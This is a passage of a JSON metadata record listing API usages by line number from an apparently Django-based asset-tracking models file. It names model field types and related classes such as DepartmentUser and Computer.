"django.contrib.gis.db.models.OneToOneField", "line_number": 209, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 209, "usage_type": "name"}, {"api_name": "tracking.models.Computer", "line_number": 209, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 209, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 210, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 210, "usage_type": "name"}, {"api_name": "tracking.models.Mobile", "line_number": 210, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 210, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 211, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 211, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 212, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 212, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 213, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 213, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 214, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 214, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 215, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 215, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 216, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 216, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 217, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.BooleanField", "line_number": 218, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 218, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 219, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 219, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 220, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 220, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 222, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 222, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tracking.models.CommonFields", "line_number": 233, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 233, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 239, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 239, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 240, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 240, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 240, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 240, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 240, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 241, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 241, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 242, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 242, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 248, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 248, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 252, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 252, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 253, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 253, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 259, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 259, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 269, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 269, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 269, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 270, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 270, "usage_type": "name"}, {"api_name": "tracking.models.CommonFields", "line_number": 280, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 280, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 310, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 310, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 311, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 311, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 312, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 312, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 313, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 313, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 314, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 314, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 315, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 315, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 316, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 316, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 317, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 317, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 317, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 317, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 317, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 318, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 318, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 318, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 318, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 318, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 319, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 319, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 319, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 319, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 319, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 320, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 320, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 320, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 320, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 320, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 321, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 321, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 322, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 322, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 323, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 323, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 324, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 324, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 325, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 325, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 326, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 326, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 327, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 327, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 328, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 328, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 329, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 329, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 330, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 330, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 331, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 331, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 332, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 332, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 333, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 333, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 334, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 334, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 335, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 335, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 336, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 336, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 337, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 337, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 337, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 337, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 339, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 339, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 340, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 340, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 340, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 340, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 342, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 342, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 343, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 343, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 344, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 344, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 345, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 345, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 346, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 346, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DurationField", "line_number": 347, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 347, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 347, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DurationField", "line_number": 348, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 348, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 348, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DurationField", "line_number": 349, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 349, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 349, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.FileField", "line_number": 350, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 350, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 353, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 353, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 355, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 355, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateField", "line_number": 356, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 356, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 372, "usage_type": "call"}, {"api_name": "tracking.models.CommonFields", "line_number": 385, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 385, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 411, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 411, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 412, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 412, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 413, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 413, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 413, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 414, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 414, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 415, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 415, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 416, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 416, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 417, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 417, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 418, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 418, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 419, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 419, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 420, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 420, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 421, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 421, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 422, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 422, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 423, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 423, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 424, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 424, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 425, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 425, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateField", "line_number": 426, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 426, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 427, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 427, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 428, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 428, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 436, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 443, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 443, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 452, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 452, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 453, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 453, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 454, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 454, "usage_type": "name"}, {"api_name": "django.contrib.postgres.fields.JSONField", "line_number": 455, "usage_type": "call"}, {"api_name": "tracking.models.CommonFields", "line_number": 461, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 461, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 465, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 465, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 466, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 466, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 467, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 467, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 468, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 468, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.NullBooleanField", "line_number": 469, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 469, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 470, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 470, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 470, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 470, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 470, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 471, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 471, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 472, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 472, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 472, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 473, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 473, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 474, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 474, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 475, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 475, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 481, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 481, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 484, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 484, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 485, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 485, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 486, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 486, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 492, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 492, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 497, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 497, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 498, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 498, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 499, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 499, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 505, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 505, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 509, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 509, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 510, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 510, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 511, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 511, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 512, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 512, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 522, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 522, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 526, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 526, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 526, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 527, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 527, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 527, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 528, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 528, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 538, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 538, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 542, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 542, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 543, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 543, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 544, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 544, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 545, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 545, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 547, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 547, "usage_type": "name"}]}